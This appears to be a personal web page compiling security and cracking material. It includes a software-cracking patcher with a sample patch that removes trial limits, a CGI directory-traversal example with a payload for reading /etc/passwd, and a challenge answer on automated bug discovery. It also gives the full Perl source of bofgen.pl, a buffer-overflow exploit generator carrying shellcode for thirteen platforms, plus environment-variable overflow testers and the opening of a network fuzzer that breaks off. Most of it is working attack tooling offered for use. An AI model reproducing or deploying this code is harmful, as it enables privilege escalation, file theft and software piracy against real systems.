- Todo list:
- make the 'Update' button more powerful
- add an image/logo into the program
- add key generation functionality
- Cracker-Patcher 5 is a program that allows you to apply patches to applications. To crack programs, you need the appropriate .cp5 file for what you're patching (incredibly small and easy to share with others).
- .cp5 files are easy to create. They're really just text files in a nice, neat format. You can find a template here. Basically, all .cp5 files contain are byte-offsets and hex data to replace data at those offsets. Hopefully keygeneration and other algorithmic expressions will be allowed in future versions.
- Download c-p5 here.
- Template .cp5 file -- hexedit210.cp5
- # hex edit 2.10 patch (made for c-p5 5.01)
- #
- # after you run this via c-p5.exe, hexedit will have
- # the trial and nag screens and the such removed
- #
- # -SeaPea5
- #
- # info lines aren't required but are good to have
- # name, version, filename, and size are best to have
- #
- # the 'important' info will be displayed to the user
- # right before the user cracks the program and will
- # be given a choice to continue or cancel, if they
- # cancel, the program will not be cracked
- #
- # name of info info itself
- info name Hex Edit # you can add
- info version 2.10 # comments at
- info description a hex editor # here, also
- info filename hedit.exe
- info size 7823360
- info author cp5
- info important The user will always see this
- info important before they crack the program
- info important and will have the choice to
- info important continue or cancel the crack
- #
- # as of 5.01-RELEASE, you can add/change registry values
- #
- # "location" "new string/data" optional type
- registry "LMachine\SOFTWARE\Blah\oldstring" "blah blah blah"
- registry "LMachine\SOFTWARE\Blah\newstring" "h4w h4w h4w" REG_SZ
- #
- # as you can see, c-p5 allows a variety of ways to modify data...
- # these 5 patches will make hex edit full
- # the 0x lines reference to the offset you want to replace data and
- # replace with the following data in hex
- #
- # the hex after can be written in a multitude of ways as shown below
- # the \d lines do the same as 0x lines,
- # but the offsets are just in decimal instead of hex
- #
- # offset replacement data in hex
- 0x174bc 4973 # offset info:
- \x0174c0 \x49 \x73 # same as 0x174c0
- 0x000174c4 0x49 0x73 # same as 0x174c4
- \d95428 49 73 # equiv to 0x174c4
- \d00095436 4973 # equiv to 0x174cc
- CC V
- by Samy Kamkar [CommPort5@LucidX.com]
- Bug Classification
- Improper filtering of CGI parameters
- Example and Description
- Many CGIs, or Common Gateway Interfaces, are used to retrieve files on the machine running the HTTP daemon and output their data to the user remotely accessing the CGI. The problem with many of these CGIs is that the developers do not include filters on the user input, when it is the user that submits the or part of the name of the file that is accessed. This allows malicious users to read files that they shouldn't have access to, or even execute programs on the machine.
- Here is some example perl code of a basic CGI with the common bug of no filtering mechanism to important user input:
- ---------------------------------------
- #!/usr/bin/perl
- use CGI qw/:standard/; # standard CGI module
- print header; # content-type header
- $dir = "htmlfiles"; # directory where the html files would be
- $file = param("file"); # input from user
- $fullpath = $dir . "/" . $file . ".html"; # create a full path
- open(FILE, "<$fullpath"); # opens the file, read-only mode
- while () { print } # to print the contents of the file
- close(FILE); # close the file
- # end of code
- ---------------------------------------
- The problem with this code is that a malicious user is able to read data that s/he shouldn't have access to. An example of this is someone trying to read /etc/passwd. /etc/passwd is a good example of a file to be read since it's almost always readable by any user and is on almost all UNIX-like systems. There are two things that are required, which should be, but aren't, filtered in this program, to allow someone to read a file such as /etc/passwd. One is to escape the directory that the open() statement would normally read in, and second is to escape the ".html" put at the end of the open(). Here is an example of a URL to read the /etc/passwd on a machine running the example CGI: http://server/cgi-bin/the.cgi?file=../../../../../../../../etc/passwd%00 The CGI then reads "htmlfiles/../../../../../../../../etc/passwd\0.html" \0 is the null terminator. The null terminator is what escapes the .html since the open() and many other functions in many languages stop reading inputted data once it reaches a null terminator. And to escape the directory that the open() reads in, we use ../'s.
- - Algorithm
- 1. Spider the website, starting from the root index.
- 2. Recursively search through all URLs on the web site to find all URLs that are on that machine.
- 3. Find all URLs in the already-found URLs that contain a '?' and assume that those are the only URLs that are vulnerable to our bug.
- 4. Find all key and element pairs in each of these URLs and find all URLs with only a key (no '=' in the URL) and consider that key an element.
- 5. Go through each key and element of each URL and replace each element of each URL with a '../' x 20 . 'etc/passwd%00'.
- 6. For every element replacement, do a GET request on that URL and match the responses for /root:/.
- 7. For each response that contains 'root:', decrement the URL by one '../', do a GET request on the new URL, and check the response again to see if it contains a 'root:' repeatedly. Once the response does not contain a 'root:', add one more '../' to the URL and log that URL as an exploitable CGI. Continue element replacement to find any other bugs for other key and element pairs.
- http://www.samy.pl/5balgo1.html
- CC V
- by H1kari, BasharTeg, CommPort5
- Sample code available here.
- You must also download the template session capture file available here.
- 5b. Automatic Exploit Discovery -
- 1. Identify classifications of common software bugs as specifically as possible
- 2. Name a theoretical example of each bug, ideally in "ASCII over TCP" protocols
- 3. Describe an algorithm for automating remote detection of those bugs in client-server software. Assume that you have a working copy of server software, captured images of valid transactions and reasonable hardware. Ideal situations will need no knowledge of the protocol grammar beyond word and seperator characters.
- The Answers -
- a1. Failure to validate input buffer lengths
- a2. In POP3 authentication, username input may not be length-validated.
- a3. Most buffer overflows can be detected in ASCII protocols by replaying a captured session repeatedly, replacing one word each time with a 4097 character word.
- - check for disconnect
- b1. Fencepost a.k.a. Off by one counting errors
- b2. In POP3 message retrieval, there could be an off-by-one error in the number of retreivable messages.
- b3. Off-by-one errors can be detected by replaying a captured session with each numeric client-side word replaced with each previously seen numeric server words.
- - check for different response
- c1. Null Pointers, Dereferencing, Page Fault
- c2. In POP3, deleting or retreiving message 0 without checking, or executing commands out of order might cause null pointers to be used.
- c3. Null Pointers can be detected by replaying a captured session and executing the commands in a different order, or by replacing numerical words with 0 or negative numbers.
- - check for disconnect
- d1. Race Conditions
- d2. In POP3 race conditions may occur when mail is received or removed and counters are modified while being read or written to by other connected clients.
- d3. Race Conditions can be detected by replaying a captured session in a control process and executing other captured sessions with the commands put in various orders at the same time and looking for unexpected results. (e.g., run your control process without a second test process, then re-run with the test process running concurrently and check for deviations with the results).
- - check for deviations
- e1. Using uninitialized variables/memory
- e2. In POP3 validation of protocol order may not be checked, sending your password before username or executing commands out of order may cause uninitialized variables to be used.
- e3. Using uninitialized variables/memory can be detected by replaying a captured session with the client-side commands put in different order.
- - check for disconnect
- f1. Poorly implemented input matching
- f2. In HTTP, failure to check filenames that might attempt a directory traversal ".." or unexpected characters or strings passed to cgi applications.
- f3. Poorly implemented input matching can be detected by replaying a captured session with each word replaced with unexpected input characters depending on the protocol. (e.g. "..", file globbing characters -- "*, ?, +, [, ]", regex matching characters -- "+, *, ?, ^, $, (, ), {, }, [, ]", format string vuln characters -- "%s, %d, %p, %n, etc", common exec exploitation characters -- ";, <, >, |, ", '", null and non-ascii characters)
- - check for different response
- g1. Memory leaks (not freeing dynamically allocated memory)
- g2. In POP3, if memory for each message is not freed and numerous messages are read, it could cause denial of service.
- g3. Memory leaks can be detected by replaying a captured session and repeating a command numerous times while checking latency and availability.
- - check for latency or disconnect
- h1. Mixing signed and unsigned number variables
- h2. In HTTP, sending an negative number as the byte count (Content-Length) for a POST, assuming the httpd uses a signed variable with the byte count. (which would check out fine if the program checks to see if the content-length is < the bytes read) And in turn if it set the length variable for the POST buffer to the negative number, it could cause the processing function to read more data than is supplied.
- h3. Improper mixing of signed and unsigned number variables can be detected by replaying a captured session with all numerical words inverted to their negative equivalent, or positive equivalent if negative.
- - check for different response
- i1. Failure to resolve escapes before validating
- i2. In HTTP, failure to resolve unicode, specialchars, and other http escaped characters before input matching.
- i3. Failure to resolve escapes before validating can be detected by replaying a normal session as well as all input matching sessions with all characters escaped.
- - check for different response
- http://www.samy.pl/5balgo2.html
- bofgen.pl - a buffer overflow exploit generation program
- bofgen.pl is a simple buffer overflow exploit generation program I worked on for a little bit, just to make some things easier. it allows you to enter simple information and will create an advanced exploit for you, portable to many different architectures and operating systems. check it out.
- bofgen.pl
- getenvs.pl - this program finds environment variables in binary programs when you don't have source available to you (or you want to find them quickly). this is especially good for finding buffer overflows in programs easily
- testenvs.pl - this will take a binary program, find all of the environment variables, and fill them up with data to attempt to overflow it. it's good with use of `find / -perm -4000`. it will easily help you find some exploitable (through ENV variables) programs and it will also attempt to exploit the program with a basic arguement buffer overflow.
- options are below for bofgen (when certain questions are answered, that value may intentionally change/add/remove other questions)
- Buffer Overflow Exploit Generation program [bofgen.pl]
- By CommPort5 [@LucidX.com]
- * = required, []'s = default (and required)
- name of your exploit [exploit.pl]:
- * path (full path recommended) to exploitable program:
- nop [\x90]:
- return address [0xbfffffff]:
- offset [0]:
- * length to overwrite %eip (without the +100):
- remove all environment variables before executing program (1 = true, 0 = false) [1]:
- * type of buffer overflow, 1 = arguement, 2 = environment:
- 1 = aix 2 = bsdi
- 3 = dg_ux 4 = freebsd
- 5 = hp_ux 6 = linux_x86
- 7 = linux_sparc 8 = openbsd
- 9 = ppc_linux 10 = ppc_bsd
- 11 = openserver 12 = solaris_sparc
- 13 = unixware
- * enter the OSs you would like support for (enter numbers, whitespace seperated):
- preceding arguements (before buffer overflow, if any):
- insert environment variable (key name, if any - not buffer overflow key):
- insert environment data for key:
- accept an offset from the user in command line (1 = true, 0 = false) [0]:
- require an offset from the user in command line (1 = true, 0 = false) [0]:
- accept a return address from the user in command line (1 = true, 0 = false) [0]:
- require a return address from the user in command line (1 = true, 0 = false) [0]:
- enter key to use to store buffer:
- Exploit saved in exploit.pl
- - made by bofgen.pl - http://bofgen.LucidX.com - CommPort5@LucidX.com -
- http://www.samy.pl/bofgen/
- #!/usr/bin/perl
- #
- # bofgen.pl - by CommPort5 [@LucidX.com]
- # a local buffer overflow exploit generation program
- # http://bofgen.LucidX.com
- #
- @{$exploit{osnums}} = (
- "aix", "bsdi", "dg_ux", "freebsd", "hp_ux",
- "linux_x86", "linux_sparc", "openbsd", "ppc_linux",
- "ppc_bsd", "openserver", "solaris_sparc", "unixware",
- );
- %shellcode = (
- aix =>
- '0x7c0802a6 . 0x9421fbb0 . 0x90010458 . 0x3c60f019 .
- 0x60632c48 . 0x90610440 . 0x3c60d002 . 0x60634c0c .
- 0x90610444 . 0x3c602f62 . 0x6063696e . 0x90610438 .
- 0x3c602f73 . 0x60636801 . 0x3863ffff . 0x9061043c .
- 0x30610438 . 0x7c842278 . 0x80410440 . 0x80010444 .
- 0x7c0903a6 . 0x4e800420 . 0x0',
- bsdi =>
- '"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" .
- "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07" .
- "\xff\xe8\xdc\xff\xff\xff/bin/sh\x00"',
- dg_ux =>
- '"\x58\xfe\xde\x23\x0f\x04\xde\x47\x04\x74\xf0\x43\xa4\x01\x8f\xb0" .
- "\xa4\x01\x4f\x21\xfb\x6b\x3f\x24\x01\x80\x21\x20\xa8\x01\x2f\xb4" .
- "\x10\x04\xff\x47\x80\xf4\xe2\x47\xff\x7f\x4a\x6b\x69\x6e\x3f\x24" .
- "\x2f\x62\x21\x20\x73\x68\x5f\x24\xff\x2f\x42\x20\x82\x16\x41\x48" .
- "\x90\x01\x2f\xb0\x94\x01\x4f\xb0\x98\x01\xef\xb5\xa0\x01\xef\xb7" .
- "\x90\x01\x0f\x22\x98\x01\x2f\x22\x12\x04\xff\x47\x80\x74\xe7\x47" .
- "\xff\x7f\xea\x6b"',
- freebsd =>
- '"\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" .
- "\x69\x89\xe3\x51\x52\x53\x53\x6a\x3b\x58\xcd\x80"',
- hp_ux =>
- '"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" .
- "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe" .
- "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff"',
- linux_x86 =>
- '"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d" .
- "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3" .
- "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0" .
- "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh"',
- linux_sparc =>
- '"\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" .
- "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10" .
- "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" .
- "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" .
- "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x10"',
- openbsd =>
- '"\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" .
- "\x69\x89\xe3\x51\x52\x53\x53\x6a\x3b\x58\xcd\x80"',
- ppc_linux =>
- '0x7CC63278 . 0x2F867FFF . 0x41BC0054 . 0x7C6802A6 .
- 0xB0C3FFF9 . 0xB0C3FFF1 . 0x38867FF0 . 0x38A67FF4 .
- 0x38E67FF3 . 0x7CA52278 . 0x7CE72278 . 0x7C853A14 .
- 0x7CC419AE . 0x7C042A14 . 0x7CE72850 . 0x7C852A14 .
- 0x7C63212E . 0x7C832214 . 0x7CC5212E . 0x7CA52A78 .
- 0x44FFFF02 . 0x7CE03B78 . 0x44FFFF02 . 0x4BFFFFB1 .
- 0x2F62696E . 0x2F73685A . 0xFFFFFFFF . 0xFFFFFFFF',
- ppc_bsd =>
- '0x7CC63278 . 0x2F867FFF . 0x41BC0054 . 0x7C6802A6 .
- 0xB0C3FFF9 . 0xB0C3FFF1 . 0x38867FF0 . 0x38A67FF4 .
- 0x38E67FF3 . 0x7CA52278 . 0x7CE72278 . 0x7C853A14 .
- 0x7CC419AE . 0x7C042A14 . 0x7CE72850 . 0x7C852A14 .
- 0x7C63212E . 0x7C832214 . 0x7CC5212E . 0x7CA52A78 .
- 0x44FFFF02 . 0x7CE03B78 . 0x44FFFF02 . 0x4BFFFFB1 .
- 0x2F62696E . 0x2F73685A . 0xFFFFFFFF . 0xFFFFFFFF',
- openserver =>
- '"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" .
- "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" .
- "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"',
- solaris_sparc =>
- '"\x90\x1b\xc0\x0f\x82\x10\x20\x17\x91\xd0\x20\x08\x90\x1b\xc0\x0f"
- "\x82\x10\x20\x1b\x91\xd0\x20\x08\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
- "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1b\xc0\x0f"
- "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc"
- "\x82\x10\x20\x3b\x91\xd0\x20\x08"',
- unixware =>
- '"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4" .
- "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf" .
- "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff" .
- "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53" .
- "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f" .
- "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff"',
- );
- %default = (
- name => "exploit.pl",
- nop => '\x90',
- ret => '0xbfffffff',
- offset => 0,
- rmenv => 0,
- aoff => 0,
- roff => 0,
- aret => 0,
- rret => 0,
- );
- %colors = ( 'clear' => 0,
- 'reset' => 0,
- 'bold' => 1,
- 'dark' => 2,
- 'underline' => 4,
- 'underscore' => 4,
- 'blink' => 5,
- 'reverse' => 7,
- 'concealed' => 8,
- 'black' => 30, 'on_black' => 40,
- 'red' => 31, 'on_red' => 41,
- 'green' => 32, 'on_green' => 42,
- 'yellow' => 33, 'on_yellow' => 43,
- 'blue' => 34, 'on_blue' => 44,
- 'magenta' => 35, 'on_magenta' => 45,
- 'cyan' => 36, 'on_cyan' => 46,
- 'white' => 37, 'on_white' => 47,
- );
- print "\nBuffer Overflow Exploit Generation program [bofgen.pl]\n";
- print "By CommPort5 [\@LucidX.com]\n\n";
- print "* = required, []'s = default (and required)\n\n";
- print "name of your exploit [$default{name}]: ";
- chomp($exploit{name} = <STDIN>);
- $exploit{name} = $default{name} if $exploit{name} eq '';
- while (!$exploit{path}) {
- print "* path (full path recommended) to exploitable program: ";
- chomp($exploit{path} = <STDIN>);
- }
- print "nop [$default{nop}]: ";
- chomp($exploit{nop} = <STDIN>);
- $exploit{nop} = $default{nop} if $exploit{nop} eq '';
- print "return address [$default{ret}]: ";
- chomp($exploit{ret} = <STDIN>);
- $exploit{ret} = $default{ret} if $exploit{ret} eq '';
- while ($exploit{offset} !~ /^\d+$/) {
- print "offset [$default{offset}]: ";
- chomp($exploit{offset} = <STDIN>);
- $exploit{offset} = $default{offset} if $exploit{offset} eq '';
- }
- while ($exploit{len} !~ /^\d+$/) {
- print "* length to overwrite %eip (without the +100): ";
- chomp($exploit{len} = <STDIN>);
- }
- $exploit{len} += 100;
- while ($exploit{rmenv} !~ /^(1|0)$/) {
- print "remove all environment variables before executing program (1 = true, 0 = false) [$default{rmenv}]: ";
- chomp($exploit{rmenv} = <STDIN>);
- $exploit{rmenv} = $default{rmenv} if $exploit{rmenv} eq '';
- }
- while ($exploit{type} !~ /^(1|2)$/) {
- print "* type of buffer overflow, 1 = arguement, 2 = environment: ";
- chomp($exploit{type} = <STDIN>);
- }
- for ($i = 1; $i <= @{$exploit{osnums}}; $i += 2) {
- print "$i = $exploit{osnums}[$i-1]\t\t";
- if ($exploit{osnums}[$i]) {
- print ($i + 1);
- print " = $exploit{osnums}[$i]";
- }
- print "\n";
- }
- while ($exploit{os} !~ /^(\s*\d+\s*)+$/) {
- print "* enter the OSs you would like support for (enter numbers, whitespace seperated): ";
- chomp($exploit{os} = <STDIN>);
- }
- foreach (split(/\s+/, $exploit{os})) {
- push(@{$exploit{oss}}, $exploit{osnums}[$_-1]);
- }
- print "preceding arguements (before buffer overflow, if any): ";
- chomp($exploit{parg} = <STDIN>);
- do {
- print "insert environment variable (key name, if any - not buffer overflow key): ";
- chomp($tmp = <STDIN>);
- if ($tmp) {
- print "insert environment data for key $tmp: ";
- chomp($exploit{keys}{$tmp} = <STDIN>);
- }
- } while ($tmp);
- while ($exploit{aoff} !~ /^(1|0)$/) {
- print "accept an offset from the user in command line (1 = true, 0 = false) [$default{aoff}]: ";
- chomp($exploit{aoff} = <STDIN>);
- $exploit{aoff} = $default{aoff} if $exploit{aoff} eq '';
- }
- if ($exploit{aoff}) {
- while ($exploit{roff} !~ /^(1|0)$/) {
- print "require an offset from the user in command line (1 = true, 0 = false) [$default{roff}]: ";
- chomp($exploit{roff} = <STDIN>);
- $exploit{roff} = $default{roff} if $exploit{roff} eq '';
- }
- }
- while ($exploit{aret} !~ /^(1|0)$/) {
- print "accept a return address from the user in command line (1 = true, 0 = false) [$default{aret}]: ";
- chomp($exploit{aret} = <STDIN>);
- $exploit{aret} = $default{aret} if $exploit{aret} eq '';
- }
- if ($exploit{aret}) {
- while ($exploit{rret} !~ /^(1|0)$/) {
- print "require a return address from the user in command line (1 = true, 0 = false) [$default{rret}]: ";
- chomp($exploit{rret} = <STDIN>);
- $exploit{rret} = $default{rret} if $exploit{rret} eq '';
- }
- }
- if ($exploit{type} == 2) {
- while (!$exploit{key}) {
- print "enter key to use to store buffer: ";
- chomp($exploit{key} = <STDIN>);
- }
- }
- $scdata = '%shellcode = (';
- for ($i = 0; $i < @{$exploit{oss}}; $i++) {
- $scdata .= "\n\t$exploit{oss}[$i]\t=>\n$shellcode{$exploit{oss}[$i]},\n";
- }
- $scdata .= ");\n\n\@os = (";
- for ($i = 0; $i < @{$exploit{oss}}; $i++) {
- $scdata .= "\n\t\"$exploit{oss}[$i]\",";
- }
- $scdata .= "\n);";
- $argdata = "<OS #> ";
- $argnum = 1;
- $argmax = 1;
- if ($exploit{aoff}) {
- if ($exploit{roff}) {
- $argdata .= "<-o offset> ";
- $argnum += 2;
- $argmax += 2;
- }
- else {
- $argdata .= "[-o offset] ";
- $argmax += 2;
- }
- }
- if ($exploit{aret}) {
- if ($exploit{rret}) {
- $argdata .= "<-r return address> ";
- $argnum += 2;
- $argmax += 2;
- }
- else {
- $argdata .= "[-r return address] ";
- $argmax += 2;
- }
- }
- print "\n";
- $comment = << "EOF";
- #
- # $exploit{name} - generated by bofgen.pl by CommPort5 [\@LucidX.com]
- # a buffer overflow exploit generation program
- # http://bofgen.LucidX.com
- #
- EOF
- $data = << "EOF";
- #!/usr/bin/perl
- $comment
- (\$osn, \$offset, \$ret) = ✓
- $scdata
- \$len = $exploit{len};
- \$nop = "$exploit{nop}";
- for (\$i = 0; \$i < (\$len - length(\$shellcode{\$os[\$osn-1]}) - 100); \$i++) {
- \$buffer .= \$nop;
- }
- \$buffer .= \$shellcode{\$os[\$osn-1]};
- \$addr = pack('l', (\$ret + \$offset));
- for (\$i += length(\$shellcode{\$os[\$osn-1]}); \$i < \$len; \$i += 4) {
- \$buffer .= \$addr;
- }
- EOF
- if ($exploit{rmenv}) {
- $data .= "foreach (keys(\%ENV)) {\n delete \$ENV{\$_};\n}\n";
- }
- foreach (keys(%{$exploit{keys}})) {
- $data .= "\$ENV{$_} = \"$exploit{keys}{$_}\";\n";
- }
- if ($exploit{type} == 1) {
- $data .= "\nexec(\"$exploit{path}\", ";
- foreach (split(/\s+/, $exploit{parg})) {
- $data .= "\"$_\", ";
- }
- $data .= "\$buffer);\n";
- }
- else {
- $data .= "\n\$ENV{$exploit{key}} = \$buffer;\nexec(\"$exploit{path}\"";
- foreach (split(/\s+/, $exploit{parg})) {
- $data .= ", \"$_\"";
- }
- $data .= ");\n";
- }
- $data .= << "EOF";
- sub check {
- \$ret = $exploit{ret};
- \$offset = $exploit{offset};
- if (\@ARGV < $argnum or \@ARGV > $argmax) {
- &error;
- }
- \$osn = shift(\@ARGV);
- for (\$i = 0; \$i < \@ARGV; \$i++) {
- if (\$ARGV[\$i] =~ /^[^-]/ && \$ARGV[\$i-1] =~ /^[^-]/) {
- &error;
- }
- if (\$ARGV[\$i] =~ /^-/) {
- if (\$ARGV[\$i] =~ /^-(o|r)\$/i) {
- if (\$1 eq 'o') {
- \$offset = \$ARGV[\$i+1];
- }
- elsif (\$1 eq 'r') {
- \$ret = \$ARGV[\$i+1];
- }
- }
- else {
- &error;
- }
- }
- }
- return(\$osn, \$offset, \$ret);
- }
- sub error {
- print STDERR "usage: \$0 $argdata\\n" if \@ARGV < $argnum;
- EOF
- for ($i = 1; $i <= @{$exploit{oss}}; $i++) {
- $data .= " print STDERR \" $i = $exploit{oss}[$i-1]\\n\";\n";
- }
- $data .= " die \"\\n\";\n}\n";
- $data .= $comment;
- open(EXPLOIT, ">$exploit{name}") or die "Can't open $exploit{name} for writing: $!\n";
- print EXPLOIT $data;
- close(EXPLOIT);
- print STDERR "Exploit saved in $exploit{name}\n";
- die "\n- made by bofgen.pl - http://bofgen.LucidX.com - CommPort5\@LucidX.com -\n";
- # h4w h4w h4w
- # -cp5
- #!/usr/bin/perl
- # getenvs.pl - by CommPort5 [@LucidX.com]
- # this is a hacked up and nice version of v9's getenv program
- # so credits go to him
- $SIG{INT} = \&data;
- $SIG{'TSTP'} = \&data;
- die "usage: $0 < /path/to/binary >\n" unless @ARGV == 1;
- @ignore = split(/\s+/,
- "TTOU TTIN TSTP STOP CONT CHLD STKFLT ALRM PIPE USR2 SEGV USR1 KILL FPE BUS IOT ABRT TRAP ILL QUIT INT HUP _DYNAMIC _GLOBAL_OFFSET_TABLE_ --");
- print "getenvs.pl :: finds environment variables in binary programs\n";
- &readbinary(@ARGV);
- &data;
- exit(0);
- sub readbinary {
- open(BINARY, shift) || die "Can't open file: $!\n";
- @read = <BINARY>;
- close(BINARY);
- $i = 0;
- $tokens = @read;
- while ($read[$i]) {
- @tmpread = split(chr(0), $read[$i]);
- $tokens = @tmpread;
- $j = -1;
- while ($j < $tokens) {
- $j++;
- $k = 0;
- while (isvalid(substr($tmpread[$j], $k, 1)) && length($tmpread[$j]) > 1) {
- if ($k + 1 == length($tmpread[$j])) {
- $m = 0;
- @s = @ignore;
- $l = 0;
- while ($s[$l]) {
- if ($s[$l] eq $tmpread[$j]) {
- $m++;
- }
- $l++;
- }
- @s = split(/,/, $result);
- $l = 0;
- while ($s[$l]) {
- if ($s[$l] eq $tmpread[$j] || $s[$l] eq " $tmpread[$j]") {
- $m++;
- }
- $l++;
- }
- if (!$m && substr($tmpread[$j], 0, 3) ne "SIG" && substr($tmpread[$j], 0, 2) ne "__" &&
- substr($tmpread[$j], length($tmpread[$j]) - 2, 2) ne "__") {
- if (!$result) {
- $result = $tmpread[$j];
- }
- else {
- $result = "$result, $tmpread[$j]";
- }
- }
- }
- $k++;
- }
- }
- $i++;
- }
- }
- sub data {
- if ($result) {
- print "possible ENV variables: $result\n";
- }
- else {
- print "no typical ENV variables found.\n";
- }
- }
- sub isvalid {
- $char = substr(shift, 0, 1);
- if (ord($char) > 64 && ord($char) < 91 || ord($char) > 47 && ord($char) < 58 || ord($char) == 45 || ord($char) == 95) {
- return 1;
- }
- return 0;
- }
- #!/usr/bin/perl
- # testenvs.pl - by CommPort5 [@LucidX.com]
- # some of this code is a hacked up version of v9's getenv program
- # for finding envs in binary programs
- $SIG{INT} = \&data;
- $SIG{'TSTP'} = \&data;
- die "usage: $0 < /path/to/binary >\n" unless @ARGV == 1;
- @ignore = split(/\s+/,
- "TERM USER TTOU TTIN TSTP STOP CONT CHLD STKFLT ALRM PIPE USR2 SEGV USR1 KILL FPE BUS IOT ABRT TRAP ILL QUIT INT HUP _DYNAMIC _GLOBAL_OFFSET_TABLE_ --");
- print "testenvs.pl :: tests environment variables in binary programs for buffer overflows\n";
- open(BINARY, shift) || die "Can't open file: $!\n";
- @read = <BINARY>;
- close(BINARY);
- $i = 0;
- $tokens = @read;
- while ($read[$i]) {
- @tmpread = split(chr(0), $read[$i]);
- $tokens = @tmpread;
- $j = -1;
- while ($j < $tokens) {
- $j++;
- $k = 0;
- while (isvalid(substr($tmpread[$j], $k, 1)) && length($tmpread[$j]) > 1) {
- if ($k + 1 == length($tmpread[$j])) {
- $m = 0;
- @s = @ignore;
- $l = 0;
- while ($s[$l]) {
- if ($s[$l] eq $tmpread[$j]) {
- $m++;
- }
- $l++;
- }
- @s = split(/,/, $result);
- $l = 0;
- while ($s[$l]) {
- if ($s[$l] eq $tmpread[$j] || $s[$l] eq " $tmpread[$j]") {
- $m++;
- }
- $l++;
- }
- if (!$m && substr($tmpread[$j], 0, 3) ne "SIG" && substr($tmpread[$j], 0, 2) ne "__" &&
- substr($tmpread[$j], length($tmpread[$j]) - 2, 2) ne "__") {
- if (!$result) {
- $result = $tmpread[$j];
- }
- else {
- $result = "$result, $tmpread[$j]";
- }
- }
- }
- $k++;
- }
- }
- $i++;
- }
- &data;
- sub data {
- if ($result) {
- foreach (split(/,\s*/, $result)) {
- $ENV{$_} = "A" x 2500;
- }
- exec("$ARGV[0] " . "A" x 2500);
- }
- else {
- print "no typical ENV variables found.\nattempt arguement overflows manually [and environment, if any].\n";
- }
- }
- sub isvalid {
- $char = substr(shift, 0, 1);
- if (ord($char) > 64 && ord($char) < 91 || ord($char) > 47 && ord($char) < 58 || ord($char) == 45 || ord($char) == 95) {
- return 1;
- }
- return 0;
- }
- http://www.samy.pl/bofgen/
- #!/usr/bin/perl
- # Caezar's Challenge 5b - by h1kari and CommPort5.
- # Shouts to BasharTeg for his help with the bug list and question answers.
- #
- # 5bhack.pl v0.01 - discovers common bugs within ascii based tcp protocols
- # using captured sessions and generic protocol information.
- #
- # this is an extremely generalized proof-of-concept, so manual checking of the
- # results must be done for accurate detection. possible future features should
- # include more intelligent protocol support and intuitive scripting for
- # protocol-specific symantics.
- #
- # NOTE: capture file must be in a format compatible to the sample capture file
- # included
- # config vars
- my $maxread = 4096;
- my $recvtout = 0.1;
- my $vulnchkstr = '../../../../../.../..../...../*?+[]^$(){}\'";<>|%s%d%p%n';
- my $_5ba_incr = 4096;
- my $_5ba_tries = 3;
- my $_5bg_tries = 10;
- my $_5bg_tout = 0.1;
- # parse input and initialize
- use Net::Telnet;
- ($ARGV[2]) or
- die "5bhack.pl - for caezar's challenge's question 5b - by h1kari and CommPort5.\n".
- "usage: $0 <capture file> <host> <port> <tests a-i> [verbose level]\n".
- " verbose:\n".
- " 0/undef - only print necessary information\n".
- " 1 - print high verbose for necessary information\n".
- " 2 - print lower-risk information\n".
- " 3 - print high verbose for lower-risk information\n";
- require $ARGV[0];
- my $host = $ARGV[1];
- my $ip = &host2ip($host);
- my $port = $ARGV[2];
- my @tests = split //, $ARGV[3];
- my $verbose = $ARGV[4];
- # run tests
- for(@tests)
- {
- if($_ =~ /^[a-i]$/)
- {
- print "----------------[ running test 5b$_....\n";
- eval "&try_5b$_";
- }
- }
- # 5ba functions
- sub try_5ba
- {
- for(1..$_5ba_tries)
- {
- my @sessions = &get_5ba_sessions(($_ * $_5ba_incr) + 1);
- &send_std_session(1, \@sessions);
- }
- }
- sub get_5ba_sessions
- {
- my $size = @_[0];
- my(@sessions, $i, $j, $k);
- $i = 0;
- foreach $j (0..$#send)
- {
- my @words = split /$sepregex+/, $send[$j];
